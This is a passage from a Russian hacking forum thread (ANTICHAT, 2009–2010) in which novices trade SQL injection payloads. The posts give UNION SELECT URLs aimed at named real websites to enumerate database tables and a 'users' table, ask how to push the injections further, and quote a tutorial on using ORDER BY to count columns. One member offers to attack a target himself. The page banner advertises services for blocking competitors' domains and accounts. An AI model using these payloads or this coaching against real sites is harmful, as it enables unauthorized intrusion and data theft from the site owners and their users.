SQL - INJECTION — ANTICHAT Forum

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
SQL - INJECTION

Страница 3 из 23

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#21

28.10.2009, 01:00

lesha_firs

Новичок

Регистрация: 25.10.2009

Сообщений: 25

С нами: 8708726

Репутация: 0

Цитата:

Сообщение от Ram0nlord

глупый вопрос..курил книги,маны и видосы))

нет,немогу,советую почитать статьи от Тохи и посмотреть его видосы(всё найдёшь в этом же разделе)

Вот смотри че он у меня выводит

=======================================
Вот где здесь номер табл. как на видео ТОХИ
вот я и спросил как ты узнал

#22

28.10.2009, 01:00

lesha_firs

Новичок

Регистрация: 25.10.2009

Сообщений: 25

С нами: 8708726

Репутация: 0

Не заметил)))))

Добавлено через 25 минут

code:

http://www.poznay-mir.ru/about.php?uid=-13+union+select+1,2,3,4,tabel_name%20from+informat ion_schema.tables--

===================
Что поставить за место %20 я перепробовал + и ,

#23

02.11.2009, 01:00

dimaxx

Участник форума

Регистрация: 24.06.2009

Сообщений: 111

С нами: 8885846

Репутация: 8

есть прога для упрощение иньекций

SQLIHelperV извините ссылочки нет

#24

23.11.2009, 01:00

Yakim

Новичок

Регистрация: 19.11.2010

Сообщений: 21

С нами: 8147126

Репутация: 0

code:

http://unitedcastbar.com/site.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6 ,7,8,9,10+from+information_schema.columns+where+ta ble_name='users'--

code:

http://www.medialaw.kz/index.php?c=-1655+union+select+group_concat(column_name),2+from +information_schema.columns+where+table_name='CHAR ACTER_SETS'--

чё тут не так?)

#25

01.01.2010, 01:00

{Brandon}

Новичок

Регистрация: 24.12.2009

Сообщений: 18

С нами: 8622326

Репутация: 0

http://www.turkishculturalfoundation...ages.php?ID=82'
Подскажите как раскрутить инъекцию дальше? я ставилю запросы но ничего не происходит.

#26

01.01.2010, 01:00

kit

Новичок

Регистрация: 11.06.2010

Сообщений: 0

С нами: 8377950

Репутация: 0

Дай ссылку на обычный сайт ща сам попробую

#27

01.01.2010, 01:00

{Brandon}

Новичок

Регистрация: 24.12.2009

Сообщений: 18

С нами: 8622326

Репутация: 0

http://www.turkishculturalfoundation.org/

Добавлено через 25 минут
просканил xspider говарит что инъекция есть

Добавлено через 1 час 1 минуту
Kit,ну что получилось чтонибудь?

Добавлено через 1 час 52 минуты
http://www.aquariustour.ru/news/
А где id взять чтоб инъекцию дальше расскрутить?

#28

10.02.2010, 01:00

ROCK_sTaR

Познающий

Регистрация: 04.02.2010

Сообщений: 45

С нами: 8561846

Репутация: 3

The used SELECT statements have a different number of columns

Это вылезает вместо просмотра таблиц БД юзера

http://sitename.net/showsoft.php?id=...ion+select+1/*

Чооооооо делать, не подскажете?))))

#29

10.02.2010, 01:00

Jmylia

Познающий

Регистрация: 17.07.2009

Сообщений: 36

С нами: 8852726

Репутация: -3

Цитата:

>The used SELECT statements have a different number of columns

Это вылезает вместо просмотра таблиц БД юзера

http://sitename.net/showsoft.php?id=...ion+select+1/*

Чооооооо делать, не подскажете?))))
================================================== ========

Если я в этом что и рублю то, вы неправильно опеределили количество таблиц(одной быть походу не может)

Сначала нужно узнать количество а уже потом просматривать версию БД и т.д.

Сначала узнайте количество таблиц при помощи команды order+by:

Цитата:

Следующим шагом нам необходимо узнать количество таблиц. Это делается при помощи команды order+by
http://site.com/main.php?id=12+order+by+1/* - при введении этой команды ошибка должна исчезнуть потомучто количество таблиц больше чем 1...
http://site.com/main.php?id=12+order+by+10000/* - ошибка появляется вновь потомучто количество таблиц меньше чем 10000
http://site.com/main.php?id=12+order+by+10/* - ошибка исчезла а при введении http://site.com/main.php?id=12+order+by+11/* появилась, из этого следует что количество таблиц 10.